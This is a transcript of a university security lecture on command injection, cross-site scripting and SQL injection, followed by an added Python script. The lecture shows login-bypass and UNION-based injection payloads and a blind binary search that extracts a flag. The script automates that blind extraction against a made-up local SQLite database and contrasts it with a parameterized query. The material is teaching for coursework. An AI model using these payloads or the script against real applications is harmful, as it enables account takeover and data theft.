All right, hello everyone, welcome to the second-to-last week of class. Everyone excited? Semester's almost done, yay. There are a lot... it does get picked up on the microphone, but they are just going wild here. Cool. Okay, I'll be here Monday and Wednesday. Unfortunately I'm out of town next week, so Connor is going to teach class and clean up, then, on binary security. I think we'll be done with content probably by next Monday, but we'll see what happens; we'll extend stuff into Wednesday. As mentioned, because I guess some people don't watch things (although I guess if you didn't watch it on Wednesday, why would I expect you to watch today on Monday), we released two modules, as we all agreed on collaboratively on Wednesday: the final two modules, web security and binary exploitation. One important note, since that got brought up: if you... am I not logged in? Sorry, let's go to the course. Okay, you're going to see my grade; I'm failing this course, by the way, in case you were wondering. Undergrad grades. So you have the weight here. This weight, because it's all the same, means nothing; this is just a relative weight between the modules. So the fact that they're all eight doesn't mean anything. They could all be one, which I'll probably just change them to, although that will still be confusing to people. It could be all nines, it could be all a thousand, it really doesn't matter; it's literally just that way. If, when running this course, I had wanted to say, oh, talking web is worth twice as much as the other modules, that would be a two and the other ones would be worth one, something like that, right? But for our purposes here it literally doesn't matter at all. So, as stated, your grade is here. This week, before Wednesday, I will post your current status of extra credit in terms of memes and thanks. I'll also pull down the latest Codebreaker challenges that were on the syllabus, too, and put them on here. That way, as stated on Wednesday, these have the latest possible deadline of January 10th,
like grades are due the next day, so that's why everything gets cut off at midnight of the 10th. This means absolute... whatever I put in the Discord. So before I start talking about stuff that's on there, let me make sure I'm saying the same content. But it means very simply that there are absolutely no extensions, so it's just fundamentally impossible. Any extensions there go over, and we need to deal with medical incompletes and other kinds of things. So if you've been thinking about that, don't think about that; if you end up in that situation, I'm sorry, but that's just the way it is. During finals week, no in-person help. So finals week is in three weeks, right: second-to-last week of class, last week of class, and then finals week. So finals week: no office hours, no recitations. And I kind of can't force anyone to be here, because they also have finals to take and everything, so you're kind of on your own on the Discord, and feel free to help each other, but don't go overboard, as normal. I don't know, just this way: whatever grade you're happy with that shows up here, that's going to be your grade, and it can only go higher with extra credit. So as soon as you feel like you're done, then you can just be done. Think of it as having a button where you just say, I'm done, and then you can't ever get a better grade; that way you can lock in and not feel like you have to do this until the 10th. Any questions on this end-of-semester class stuff? Sorry, I just realized I was not on; the 15 people on Twitch, okay. No hands. All right, now let's get to learning. Cool. So we left off on command injection. Command injection, as we hopefully recall, is when an application (most of the things we're talking about here are web applications) takes our input, concatenates it with other strings, and then passes it to something like system, which then gets re-parsed by bash just as if we had typed this in on the command line. So we saw different types of and
ways to exploit this. I'm not going to go over these, because we went over them on Wednesday and you can watch that lecture. I think the key thing, because I've seen some people maybe struggle in the Discord, the key issue here is to think: you have full and total power here, right? So whatever you're typing in here, once you can execute a command, it is as if you were, in our case, the root user, and you're tricking the root user to type in whatever the heck you want. So even if, like in this case we saw, maybe running a certain command didn't show the whole flag, where we weren't able to actually extract the flag that way, we're still root; we can do whatever we want. What are some things maybe that we would want to do, at a high level, without talking about specific commands, to accomplish our goal? What is our goal? Let's go one level up: what is our goal on the challenges? What's always your goal? You've been doing this for seven modules; this has been a key chunk of your life. Yeah, get the flag. Yeah, so if you can't just output it directly by doing cat flag, because the program doesn't necessarily give you that output, what other things could you do? You could run ls, but you need to get the output. So the question is, how do you get the output? If you can run commands without getting the output, how could you get the flag? You got a whole module on this about accessing stuff with control. Yeah, mv, yeah, move it to a different file. There's nothing that says that it has to be in that file, so you can move it, or copy it, or alter the permissions. You could alter the permissions of the destination file. You could fundamentally do anything you wanted to do as that root user, so you could do all kinds of fun stuff. But yeah, so think creatively, as if you were root there: you can't get the output of the command, but you want to get that file eventually. Cool, okay, moving to HTML. Yes, question? Sure, you are running as root. setuid is only so
that copy would run as root, right? So the fact is you are fundamentally running as root when you can trick the challenge binary; the challenge web server is running as root, so it can do anything. Yeah, cool. Other questions? Wow, super weird that nobody's sitting over there. Did you all do that on purpose? Nobody wanted to sit on that third of the room, just all gravitated over here. Weirdly, some people come in that way, I don't know. Yeah, I mean obviously it makes sense, but it's very weird because most people have sat over there. Anyways, okay, this is what happens when it's close to Thanksgiving. Okay, so, other... huh? Are you trying to get... no, this has been a whole room; you guys have normally been equally spread out in terms of this room. Nobody has to sit over there; don't move, because all your stuff's there. That's a false move. But hey, look, you have such a better view of the screen there. Anyways, sorry, I notice these things. Okay, so other things. So we talked about HTML, right? HTML is a web application's way of specifying to the user what the structure of the document should look like: what links they can click on, what forms they can fill out, what things they can do to the web application. And so very often a web application will create its HTML response by, again, concatenating strings together. So here is an example application that has, in between p tags, a string "Hello," and then some name, in red, being the user's input. So why might this functionality exist? You're writing an application; have you ever seen a website do this? I can start calling on people, does that help? Start at the left side of the room and go. What's up? Yeah, so the idea being, now it's a dynamic website that nicely greets the user, right? So depending on who the user is, how they're logged in, we can see, oh, it's this user, great, I can be a friendly application, I can say hello to that specific person. Maybe the results that I give are also unique to that
user. So the feed that I'm showing, whatever, if it's like a Facebook newsfeed thing or whatever, but the point is I can customize my HTML response to each of you depending on who you are. Now the problem is, if that input comes directly from the user, now fundamentally I can control and have any code that I want be executed there. And one of the key things, so again, if we go back to, let me look at, it's here, yes. So we look back at HTML, right? So now if I can inject content and control the structure of this HTML page, I can get it to be whatever I want. Now, does it seem that exciting? Maybe I can add more links to the page or something, or I don't know, trick them to click on something. But a key thing that we can make them do, do I not have any... one of the key things that we can do is actually get them to execute some code that will run inside of their browser, which actually sounds insane, and it's because it is. Every time your browser accesses a web page, almost every single page will send you some code that your browser, running on your machine, interprets and executes, whatever code that website sends. And that is JavaScript. So let's look at, I guess we can look at here, there is some JavaScript in here, yes. Where do I start poking around? Remember how this works: Sources, I think, Scripts, yeah, there we go. Cool. So there's a ton of JavaScript; this is all JavaScript that's executed every time you visit any site on pwn.college. Similar-style JavaScript exists everywhere else, but the point is this is code that is running inside of your browser and has access to everything inside of this web page. So, oops, hello. Okay, let me show an example. Okay, I am going to increase the font size here. Okay, let's go back to our example. Cool. Okay, so this isn't really a dynamic website; this is literally just going to be me editing a text file and then us loading that text file in our browser. Let's see if I can... cool, everyone see on the right I have this? So if we pass
in the name of CSE 365, refresh, right, so just like a dynamic website. So my browser is parsing this, and again, because it's a parser, it has to figure out where those starting and ending tags are. So we can do cool things like, we can change our name and make it into a link that the user can click. Can I change what happens before here? No, I can't, because this is a constant string that is concatenated, so I can't control what happens before and I can't control what happens afterwards, right? So every time we're thinking about injection we need to be thinking about what parts I control and what parts I don't control. So here I'm controlling just this name in here. I could really mess things up; I could do, maybe, ending HTML, oops, and then the page looks literally like this. Oh, where's the inspect source? Source, yeah. So now it's kind of like, it depends on how the parser is going to interpret this: will it do this as the end of the page, will it keep showing the stuff that's after? Let's check. If I write something after here, I actually do see that. That's really weird; I'm not sure if this is common for all browser engines. I can start another HTML tag, yeah, and then what if I end this one? Anyways, the point is I can completely control everything that happens here, but one of the big things I would want to do is start executing JavaScript. So, JavaScript was... I'm going to go back, and we're going to go back in time. Okay, all right, since I know we got a little bit of time we can do this. Ah, there we go. Cool. So this was the modern HTML lab we've been looking at: very static, has images, tables, you can set font size, but fundamentally the content was static. And this actually gave rise to early websites like, a lot, Yahoo. Did you guys know Yahoo was literally just a Yellow Pages or a directory for the internet? So there were different categories; if you're interested in art or education or entertainment you could click in there and there would be links to
other places on the web. So it's just a way literally to find things in this incredibly... this is actually even before, there's a time before where it didn't even have search; there was no ability to search here. This was the first Amazon website, and you can see, very simple, just literally a website to sell books. AltaVista was one of the first search engines that actually allowed you to type in stuff in the search bar, and it would just very crappily look for any web page that had that search term in it. And this, the actually shocking thing about all this, is this was the first Google beta from 1998, and you can see that it's almost exactly the same. It's actually even simpler of a design, the Google homepage, than it was here. But the important problem is we want to be able to do fancy things and animations, and be able to dynamically respond on the client, because every time you clicked a link on any of these pages or hit the search bar, your browser would then have to make a new HTTP request to the server, the server would process it, send the response back in HTML, and your browser then parse that HTML. But sometimes you don't need all of that, and that became the birth of JavaScript. So I want to tell you a little bit about the history here. It was originally designed as a language to run inside your browser to interact with and manipulate HTML. How many of you know Java? Yeah, many of you, great. JavaScript has nothing in common with Java except for the first four letters, and this was actually a literal... so it was originally created in 1995 for Netscape, one of the browsers at the time, called LiveScript; like, you got to script things live in your browser. It was renamed in December 1995, literally, "JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the internet." This is in 1995, whereas JavaScript in Wikipedia is a
prototype-based scripting language with dynamic typing and first-class functions. So this actually has nothing to do with Java; it's literally a different... the syntax is very similar because they both derive syntax from C, but fundamentally prototype-based is very much in opposition to class and object orientation, so calling it an object scripting language is super weird. Literally, it was basically a marketing ploy, because, believe it or not, I know this may be very hard to believe, at the time, in like 1995, Java was considered the hot new language. I don't know, what's a hot new language that you all think is cool? Yeah, Rust. So this was like the Rust. Actually, it's a very apt description, because with Java they told everyone, hey, this is great, you don't have to worry about buffer overflows, just like Rust, and you write once and deploy everywhere, because you write it, it compiles to the JVM, and different JVM implementations run on different machines. What it turned out was, write once, debug everywhere was actually the real thing that happened. So anyways, hopefully in 20 years maybe you'll remember this class, and as soon as you tell people that you used to think Rust was cool, they go, whoa, that's such an old language, why would you ever think that? But anyways, in 1996 Microsoft added support for JavaScript to Internet Explorer, and it turned into a standardization. So the JavaScript language was standardized in 1996, but fundamentally was just created for one browser to add some dynamic capabilities, and now it is essentially the language of the web. So JavaScript is fundamentally the way that you think about, and is supported by, all browsers, and it evolved organically along the way, which is why it's very, very weird. But let me show you some examples. So you use the script element, or the script tags, as the way of creating JavaScript. So you have script tags. This was a very,
very old style of doing this, where you had these tags; here is an HTML comment, so it tells the browser, hey, consider anything in here to be a comment. And this was for browsers that didn't support JavaScript; that way they wouldn't show what was in the script tags. So if you're a browser and you did support it, you would know not to take off those HTML comments and you would start executing the code there. So you can do things like, there's a whole system and stuff, but it's very similar to what you're doing; it's not anything that's too crazy. So you can prompt things like, hey, please enter your name; you can set that to a variable called name; you can check if name is null, then write "welcome to my site", otherwise write "welcome to my site" and then, the plus is concatenation here, the name. So you can do this. You can also specify exactly the language here, although this is really not needed now. So you could run this page and it would say, hey, please enter your name below; you could enter something like Adam, and then it would say, hey, welcome to my site, Adam. Okay. You can also include external JavaScript files. This is actually not strictly needed for what we're doing, but something that's very useful is you can have a source attribute, then have an absolute or relative URL, and so the browser, when it parses this, will make another HTTP request, fetch that content, and execute it as if it was JavaScript code. Okay, I'm going to skip all this; we don't need to do this. Okay, JavaScript though is... okay, so everything in JavaScript is an object, and guess what, you learned JSON way back when, when you were making web requests by hand in netcat, those fun, fun days. So JSON, those everything-in-curly-braces, JSON derives from the syntax for JavaScript objects. Objects are pretty sweet; they're just like hash tables or arrays; you can add properties and values at runtime. So you can have something like var object equals, and so the curly braces, so this is an object that has one property
named test with the value foo, as a string, and another property num with the value of 50. We can then... so objects, you can think of, they can be recursive, you can have object, and this is accessing a property, so this is with array syntax, saying the object, the property with name foo, set it to be equal to object, and we can log itself. So we can do object test, is what, here in this example, foo, and then object foo is the object itself, because we said it here, object foo. You can set num to be 1000, we can log it, and then we can look at it here in the console. One of the cool things is, if you're ever curious about how something works in JavaScript, you can open up your good old web browser, here in the console, you can just put code here and you can just type it in. Can I make this... oh yeah, there we go. So I can type all this in here, so I can look and inspect this object. So this is my object called object that has three properties: foo, num, and test. foo is the object itself, so if you keep going down foo it'll go down here forever. One thing, so I use this syntax, right, object bracket string foo; this is one way you can access properties. The other way is the dot syntax, so you can just say object.
foo, and it's exactly the same thing; it's literally just the same syntactic sugar for the exact same thing. Okay, I think that's all we need to do under here; there's much more complicated stuff. So what we can do is, now we are here. So once we have this injection we can write any JavaScript code we want inside of script tags. One of the classic things, if you look up the alert function: it instructs the browser to display a dialog with an optional message. This is one of the ways that, as security analysts, we show that we can execute JavaScript code on your web page, by making it pop up a window here. So this is JavaScript code, so when I refresh, the very first thing it does, it's parsing this, and did the developer, the original developer of this website, intend for there to be JavaScript code here? No. This is only because we, the attacker, tricked the web application to include this JavaScript code, and so we can do whatever we want here. We can, I think that's how you do it, let's see, nope, that's writing it there. I always have to look this stuff up: JavaScript overwrite HTML of page. Ah, .replace, document.
replace, oh okay, document.open, document.write, document.close, that's HTML, innerHTML, there we go, that works. Boom, so completely changing the content of the page. We can do, let's see, redirect, is it document.redirect with JavaScript; it may have blocked it because of the domains; oh, location, that's right. Boom, so redirecting them to another place. Fundamentally I can do whatever I want. I can, if the web application uses cookies, which this one probably will not, ah, it won't even let me go back, that's really... yeah, undefined, because I don't have any cookies. Let's insert some cookies: Storage, Local Storage, add new, password, I don't know. JavaScript depends on how it set the cookies, but let me just double check: cookie, not cookies. See, this is why reading the documentation is so important; this is why I had to tell you what to do. And that did nothing. I can go to the console here: document.cookies, cookie, cookies, yeah, there we go. Cool, so if cookies were set I could get them, I guess it should be like this, yeah. It could be about the specific way that I set them, if you could get them or not; there are lots of possible security measures here, but fundamentally I could do anything. And this means that if I was now, and especially if you're logged into this website, I can now act as you, as the user. So I could steal your cookies to try to log in as you; I could have you, the user, transfer me... remember when we looked at the bank transferring money, right, between things? Introduction, oh yeah, here we go, here's our good friend the bank, right? So if I were able to trick Blue into executing code from Green, from the bank, that says hey, transfer money, $1,000 from Red, the bank has no idea that this is not coming from the actual user. So you can really do anything there. Cool, okay, questions here? All right. Oh, and I guess, just for the record, when you go out into the world, this is called cross-site scripting, the idea being another, a criminal or a hacker
got you, tricked your browser into executing JavaScript that they wanted to execute, so that's the cross-site. And the abbreviation for this is XSS, so if you see that, that's what that means. Okay, cool. Now again, another case where people want to concatenate strings is when creating SQL queries. So here we have a SQL query: select star from users where username equals single quote Connor single quote and password equals single quote password123 single quote. This was the example when we were looking at SQL. So what's the point of this query? What would be a use case of this query? Yeah, yeah, why would we want to look for the specific user's information? Say it again. Yeah, so we're trying to check, so this would be an application where they're trying to check, did the user provide the correct username and password, right? So like, yeah, they're going to log in; we're going to check first, hey, does there exist any user in this database that has the username Connor and the password of password123? If it does, presumably then we would log the user in. That's exactly what this query would do. Now, fundamentally, if we control what's in the string Connor, and here in this password, we can fundamentally put in whatever we want here. So let's do... do you guys want to try it on a real database? Now where is there a real database? Oh, there we go; this is where you're just hoping that somewhere back in your history somebody did this once. Okay, where do I have a web server running? Access, such a pain, I don't like SQLite. Okay, I think I have an idea, let's see. Usually I can quickly install something on here. Can't locate the package mysql, oh, it's mysql-server, okay. We'll just install MySQL server on a random thing, we'll create the table, this will be super fun, and then we will hack it. Okay, it's running, very good progress. All right, now I'm into MySQL server, I'm running, so now when I'm typing commands in here, it's as if we're running queries. So I could say select, and
let me make this bigger. Okay, it's going to say error, no database selected. So use, wait, do I create it first? use 365, mysql, okay, I did, okay, oh, I guess I can't do that. create database hackme; use hackme; create, what is it, table users. All right, MySQL, a data type: varchars are great, just means variable characters. Okay, I see, actually it should just work without the strings, no? Yay, okay. insert into users values admin, supersecret. Want to make sure: insert into users values value one, value two; how do I do multiple values? I think it's just separated by commas, like this. Okay, and let's go back to our thing: admin, password, Connor, okay, password123. select: hey, got data in there, cool. Okay, now let's go back to our query. So we're going to simulate having a website; we are writing this statement, okay, select, so it's going to be select star from users where username is equal to name and password equals password. Okay, so let's run this. Okay, why did that return nothing? We don't have anything in the database that matches that. Okay, we did have the example of... why is there a space in front of here? Why is this not saving this query? It's gonna drive me insane. Okay, Connor, so now if we know Connor's password we can log in, and that returns one user, so our web application would say, great, user accepted, log in. Awesome. Okay, so weird. So you can write anything into this string. Where do you, what do you control? The username and password, specifically after the single quotes. So why is the, so the application is specifically adding single quotes around your input, because it knows that this is how you specify a string in MySQL. So specifically here and here we control inside of those strings. Awesome. So select star from users where username is equal to Connor, so we can put in, if there's no restrictions from the web application, we can put in whatever we want here. So what might we want to put in? Yeah, another single quote. What's the point of that single quote? So it matches the
first single quote, and now what do you want to type in? Yeah, so, or, maybe, so we say username is equal to blank, or 1 equals 1. What do you want to put in for password? Let's just do password. Okay, what's gonna happen when I hit enter? Yeah, it's not going to let me, and I wish it didn't do this. Oh, I have an idea, okay, let's do this, this is a great example. I'll do this: quit, sudo mysql, do you just write the command here? No, it's first the database name, hackme, and then -e, yeah, that's right, okay, thank you. Okay, cool, because I wanted to simulate more of what happened. And as you saw, when we tried to enter that command, the MySQL prompt wouldn't even let you type that in, because it has a syntax error. What's the problem? We put in single quote, space, or, space, 1 equals 1, and then the application put a single quote and password equals, and then this single quote, but then there's a password and then a dangling single quote, right? So we're very close here, but the problem is we're not matching those things, and the problem is there's a bunch of gibberish that we have to deal with after this. So what was the trick we used in command injection in order to not have to deal with anything that came after us? What was that? Comment it out. Let's look up, I think we talked about it in the last one, but let's look up MySQL comment syntax: from a dash character, or, sorry, a hash character, to the end of the line, or from a double dash to the end of the line. I'm going to show you the double dash, because the database you're going to be using is SQLite, and I want to show you one that works on both. I believe it's double dash, yeah. And so you can see this; anybody remember this type of graph back when we looked at JSON syntax? So here in SQLite, dash dash, to anything except newline, to newline, will be a comment, and that's the same in SQLite and in MySQL. So we do this. I really hope that was going to work; why did that not work? Oh, I think we
need a space. Yes, there we go. Okay, why did we need the space? Because the characters were specifically a double dash without any space at the end; I guess MySQL is trying to interpret that as its own thing and doesn't really see the... let's actually look; this is crazy, ah, insane. I wonder if this is what messed me up on a CTF once; it's interesting. Anyways, okay, so what did this do? Why did this return us all the results in the database? Yeah, so this is the query that we ran: select star from users where username is equal to blank or 1 equals 1. How many times is 1 equals 1 true? It's always true, and true or false is true, so this returns true for every single row in the database and returns all of the rows. What if we just wanted to return the admin, rather than doing or 1 equals 1, what would we do? Louder. admin, and then... what if I do this, what is it going to do? Still gonna return all. Why? Yeah, for all of them. So how do I fix it? Say it again. Cool, so now let's say we do this on the login form. We say, hey, we want to log in as the admin, here's my password, password, but actually I say we don't want to log in as admin, we want to log in as admin tick space dash dash space, and it goes, it says, oh yep, there's one result, that's good, let me log you in now as this user, and then boom, you've now logged in as the admin user. And we can even go, let's see, where are we going here, make sure I'm balancing the time, cool, oh yeah, perfect. Okay, we can even go crazier than here. So let's do, let's create table, I feel like I have that syntax, nope: create table flag, let's say there's flag that's a varchar 255, okay, insert into flag values, P, get this flag. Okay, so let's say we get this output; well, let's say it's not the username and password, but whatever, we get this output, but we can control... so again, we can control anything in password; we kind of figured we don't need to do that, because we can deal with anything that's in here. So just by changing this username, now can I control
anything that happens before the username, select star from users where? No, we cannot. But so you can use this, as we saw, to get anybody's username. We can also, so let me, did we talk about that? MySQL get tables, so let's look up, yeah, cool. So it turns out two things we need to look at. One, let's go back to just our normal MySQL, eww, gross, okay, that's too many tables. Ah, this person sucks. Okay, table_schema, test, I haven't seen that. MySQL, this has a ton of information, let's see, DB5, okay, okay, here's, oh, am I not, wait, use ha, nope, okay. I feel like this should be a lot easier. Okay, there we go, yeah, there we go. Why does that reveal so much? I thought there was like... okay, well, here is our hackme and here is the users and flag, yeah, there we go, thank you. But what do we put for table? Is it a base table? Let's just do a select all on that; this is something you can look up, by the way. It's not... yeah, but where's the, oh God, what? Okay, but why, why is this, this should be very simple. What are you trying to select? I want to see the tables, but just the user tables; why is there all this, there's a bunch of junk tables, there's 330 tables, you want to make it slightly simpler. Table, yeah, I would like this but with only the user table. This is definitely the way... oh, they're right at the top, but, all right, I will find this, no, okay, that was gonna be a cool demo. All right, oh, that's what I want: inject all the things, hey, there we go, PayloadsAllTheThings, that's what, okay, this has everything I could ever need, cheat sheet, MySQL injection, MySQL, oh good, it has all the comments, testing, yes, okay, great, great, extract database with information_schema, thank you, tables, that's annoying, oh, schema, okay, great. Ah, okay, okay, okay, so these are all the different databases, excellent, okay, and then, ah, there we go, I hate how it does this. I see, so I had to first figure out what the database name was, okay, and I could just do the table name, got it, okay. Now I figured out how to pivot here, okay, perfect, where were we, cool, okay
Okay, so we are back here: SELECT * FROM users WHERE username equals blah. Okay, this is where we were, great. Now let's say we have our tick. Now, everybody remember our friend the UNION syntax, which was used to union two SELECT statements? Yeah. So how many columns did our users table have? Two columns. We may or may not know that, depending... if we don't, we can actually just keep guessing. We can do foo, uh, that's right, let's just go like this. Okay, there we go, that's the syntax. So this SELECT foo, bar... yeah, so if we did... and what's super interesting, you won't have to get into this, but oh, it does do that. So you can figure out how many columns are needed by just keeping adding one to the SELECT statement until you get the correct... you get an output, a non-error; everything else errors. So what this does is say: hey, SELECT * FROM users for username is equal to nothing, which we don't care about, UNION that with SELECT 1, 2, 3. Well, SELECT 1, 2, 3 is not very useful, and SELECT foo, bar is also not useful. Why is this not useful? Yeah, well, this foo, bar... like, we gave that input, so it's just proving that what we give comes back to us, but we gave that, so that's not interesting. But I don't even know where the data is that I want, but I know by looking it up in that PayloadsAllTheThings that I can select in MySQL (and other database engines have very similar things). I could say SELECT... and that's going to fail because that has the wrong number of columns. So what I really want from here... what did I want from schemata? I want the schema name. SELECT schema_name, again, is not going to work, because when I'm unioning it has one column on the right side and two columns on the left, so I just need to add something. So this shows me that, hey, there's the mysql schema, information_schema, performance_schema, sys, and hackme. hackme sounds good. Let's figure out all the tables in hackme. So now I can use my other query, now that I know that I can do... where was my query? There we go. So now I'm going
to UNION that query with SELECT * FROM information_schema.tables WHERE table_schema is equal to hackme. That will not work, so I want... I believe it's just called table_name. So table_name: I have flag and users. I'm already querying the users table, so which data do I want, like which table do I want of these two tables? Flag, we want the flag, let's get the flag. Actually, from here I don't know what the columns are, but you can actually read, if you really want to, all the columns in that table, so you can figure out, of the flags table, what the columns are. But we can do that here now that I know what table to search for. SELECT * FROM flags: wrong number of columns. So I actually now will need to do that, so let's select columns where table name... okay, SELECT * FROM columns WHERE table_name is equal to flag. Okay, wrong number of columns; I will do column_name. Aha, there's a flag, so it should just be SELECT flag FROM flag. That won't work because of the wrong number of columns. Fix: flag, comma, one. Ah, there we go, so now I've finally got the flag. So fundamentally, from doing this you can actually get... Are the parentheses necessary around this SELECT statement? No, they're not, it just helped me when I was doing that. That was a question on Twitch. SQL syntax is almost a little too forgiving, so I just like to be very careful there. Yeah, yeah, so this just means... so what I'm saying is: hey, select from the table flags, and for my results I want the first column to be flag, whatever is in the database as flag, and the second column I just want to be one, like the literal 1. So that's what this does: this just returns 1 for the password. I could make it return a string as foo, I can make it return whatever I want, I could put flag twice. But the important thing is, with the UNION, the SELECT on the left, the users table, has two columns, so the result when you union them has to have two, otherwise you can't put them together, right? If
like, think about building blocks, right? Like Legos: you have a size two, and you had a one and tried to put that on there, that's not going to work. If you had a three, that's too big. It has to be exactly the same size, so that your application gets all those same results. And the crazy thing is... do they... I can't remember, do they do this in the assignment, the blind one? Yeah. So what's crazy is you can... so we were able to read the flag here. Why? Because we can see the output here, right, in this table; we see these results. The application may or may not give us the results here. So, one... but you can do really cool things. You can actually... and there is a... I guess I don't have it installed. Do we have it installed on the dojo? No. So we can do cool things like... okay, let me see, I want to do this: users. You can select... let's see, there are... hey, there we go. So we can actually do things like SELECT... or let's say we can't get this, so all we're getting for output is foo, foo, but we can say WHERE LEFT(flag, ...). Let's see, string, length, say one. So what I can do is set up a SQL query such that it returns something, it returns results, if the first character of the flag... so this LEFT function, I just looked up from the documentation, specifies the number of characters from the left of the string; both the number and the string are supplied as arguments of the function. So this would be the string and the length. So I can iterate over this and brute force all the characters from a to z, big A to big Z, 0 through 9. And what's the difference, how do I know if I'm correct? Wait, why did that work? SQL must be case-insensitive. That was not what I meant to show. Wow, that's annoying. Okay, this is the problem when you just copy and paste random stuff. Okay, SQL case-sensitive comparison MySQL... ah, okay, all right, it's fine. Okay, so I know it's not a, I know it's not b, but when I get to p... so why is that? So let's say the application will give me an error if there's nothing,
or give me a page, like a 500 versus a 200 error. So the only thing I can see... I can't see what it returns, but I can know if my query gave zero results or nonzero results. So that's what we're doing here: by checking and taking the flag, by creating a WHERE clause such that I have a condition based on part of the flag and a value that I supply, I can then test, and I can make 255 of these queries for each character. I can even... let's see, MySQL SQL function ORD, or Python... there's a way to turn it... yeah, there we go, no, not Python. Yeah, or just like... ah, it is ORD. So just like in, what do I call it, in Python, we can call ORD on this to turn it into an integer, and then that will not work, but if we do man ascii... let's see, p is at 70 and capital P is going to be at 50, and these are hex. Aha, there we go. So now we found a way to determine the case of this. So if our program in the first case gives us a 500 error, we can use that. So this is the crazy thing: with one bit of information, whether the query returns something or doesn't return something, we can use this to brute force this. And what's even crazier... so what's faster than a linear search through 0 to 255 to see which one hits? Somebody's taking 310, yeah. Yeah, so it's faster than a linear search. So rather than searching, trying everything 0 to 255, yeah, a binary search. So I can do something like... because I don't have to do equality, I can do less than or equal to, right? So I can say, is this less than... and I would do what's in the middle of 0 and 255: 255 divided by 2, let's say 127, which it definitely will be. So this is a yes, I got a yes response because I got something back. So okay, so now between 0 and 127, I can do 127 divided by 2, 63. Nope, it's not less than that, so I know it's somewhere between 63 and 127. 63... doing this by hand is kind of a pain, but this is why you have computers. 96, 96. So it's not, so it's between 96 and 127. 112, okay, it's not that.
Connor, you're a great oracle. 120, yes. So it's between 120 and 112. 116. 116, yes. So between 116 and 112. 118. 118, yes. 119. 119, yes. Also yes... I have to check equality at some point, right? Something is wrong. Oh, Connor, Connor, Connor. So it's not less than 112, but it is less than 120 and less than... I see, yeah. So we should have gone down after 118, right? So we should have done 114. We will find it. Correct, yes, not 112. So what does that mean? It is, it is, yeah. So, yay, binary search. Well, you know, we are not computers, it's okay if we're not doing the binary search properly. Yes, there we go. Okay, that's octal, so it's octal, decimal, and hex. So it's p. So we figured out the first character. We can do... yes, thank you, there's much rejoicing from the audience. Oh shoot, that took a long time. Okay, so we first have to then put everything together of why this is safe. So as we talked about with JavaScript, you have basically random code that you're downloading onto your machine, and the whole point is that your browser wants to ensure that different websites and different tabs (you can think of them as tabs) can't really mess with each other. So when you're accessing something and you're including images there from, let's say, red and from blue, your browser will then go and fetch those, and it can... yes. So the way this works is it gets to... what is the same-origin policy? So the origin is this three-tuple of scheme, host, and port: scheme being HTTP or HTTPS, host being the domain name, and port being the port of the connection. So anything where that triple is the same exists in the same origin. So for instance, HTTP example.com has the... I hate this, this is the dreaded Google Slides to PowerPoint conversion. example.com, the root site, has the origin HTTP, example.com, and 80, which, if you're fetching cat.gif from there, is the same: HTTP, example, 80. Whereas if it's from a different origin, even if it's the exact same host and port, that is a different origin; a different port is a different... and
so you can send cross-origin requests if there are... wow, okay, dang. All right, sorry, we're at the end of time. We're going to have to... we spent too much time on SQL injection, but we'll do this on Wednesday.
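An added example, not part of the lecture, that automates the by-hand binary search from the blind-injection part of the class against a constructed in-memory SQLite stand-in for the hackme database: the concatenated query that the lecture injects into, the one-bit "rows or no rows" oracle, the search over the character's code point, and the parameterized lookup that gives the oracle nothing to work with. SQLite has neither ORD nor LEFT, so `unicode(substr(...))` is assumed in their place, and the table names and flag value are made up for the demo.

```python
import sqlite3

# Constructed stand-in for the lecture's "hackme" database (not the course's DB).
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (username TEXT, password TEXT);
    CREATE TABLE flags (flag TEXT);
    INSERT INTO users VALUES ('alice', 'hunter2');
    INSERT INTO flags VALUES ('pwn{demo}');
""")

def vulnerable_lookup(username):
    """Query built by concatenation, as in the lecture. The caller learns only
    one bit: some row came back (200) or nothing/an error (500)."""
    sql = "SELECT * FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def safe_lookup(username):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    return conn.execute("SELECT * FROM users WHERE username = ?",
                        (username,)).fetchone() is not None

def extract_flag(oracle, max_len=64):
    """Recover the flag from the yes/no oracle alone. SQLite lacks ORD/LEFT, so
    unicode(substr(...)) stands in for the lecture's ORD(LEFT(...)); each code
    point is binary-searched over 0..127. Returns (flag, query_count)."""
    expr = "coalesce(unicode(substr((SELECT flag FROM flags), {pos}, 1)), 0)"
    flag, queries = "", 0
    for pos in range(1, max_len + 1):
        cond = expr.format(pos=pos)
        lo, hi = 0, 127
        while lo < hi:                      # always 7 queries per character
            mid = (lo + hi) // 2
            queries += 1
            if oracle(f"' OR {cond} <= {mid} -- "):
                hi = mid
            else:
                lo = mid + 1
        if lo == 0:                         # substr ran past the end of the flag
            break
        queries += 1                        # confirm the guess with equality;
        if not oracle(f"' OR {cond} = {lo} -- "):   # never true for safe_lookup
            break
        flag += chr(lo)
    return flag, queries
```

Against `vulnerable_lookup` the nine-character flag costs 79 requests (8 per character plus 7 to detect the end), against `safe_lookup` the first equality check fails and extraction stops after 8; on the server side, that burst of near-identical requests differing only in a number is the pattern worth alerting on.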